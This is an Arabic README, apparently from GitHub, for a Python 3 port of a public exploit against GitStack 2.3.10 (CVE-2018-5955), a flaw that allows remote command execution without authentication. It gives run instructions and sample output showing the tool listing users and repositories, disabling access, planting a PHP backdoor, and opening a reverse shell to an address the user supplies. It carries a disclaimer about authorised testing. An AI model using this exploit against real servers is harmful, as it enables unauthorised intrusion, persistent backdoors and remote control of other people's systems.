
استغلال لثغرة CVE-2018-5955 في GitStack 2.3.10: RCE بدون مصادقة
استغلال لثغرة CVE-2018-5955 في GitStack 2.3.10 - تنفيذ أوامر عن بُعد بدون مصادقة
الاستغلال: GitStack 2.3.10 تنفيذ أوامر عن بُعد بدون مصادقة
التاريخ: 18.01.2018
رابط البرنامج: https://gitstack.com/
مؤلف الاستغلال: Kacper Szurek
الاستغلال الأصلي: https://www.exploit-db.com/exploits/43777
الموقع الإلكتروني: https://security.szurek.pl/
الفئة: remote
CVE: CVE-2018-5955
التاريخ: 23.06.2023
الميزات الجديدة: تفاعل RCE، كشف نظام التشغيل، دالة الصدفة العكسية، تم تكييفه من python2 إلى python3
CVE: CVE-2018-5955
الفئة: remote
أنا لا أتحمل أي مسؤولية عن أفعالك، فقد نشرته على جيثب لأغراض تعليمية أو لاختبار الاختراق المعتمد والمرخّص.
تثبيت المتطلبات:
pip install colorama
ثم يمكنك تشغيله باستخدام:
python3 exploit.py
سيتم اكتشاف نظام التشغيل بعد استغلال الثغرة CVE، وسيظهر هذا السطر في المخرجات: "[*] OS: $operatingsystem" (توضيح أدناه)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
يمكنك أيضًا كتابة "os" لمعرفة نوع نظام التشغيل.
للحصول على صدفة عكسية فعلية على الهدف، يمكنك كتابة "shell" ثم إدخال عنوان IP ومنفذ الاستماع الخاص بك كما يلي:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE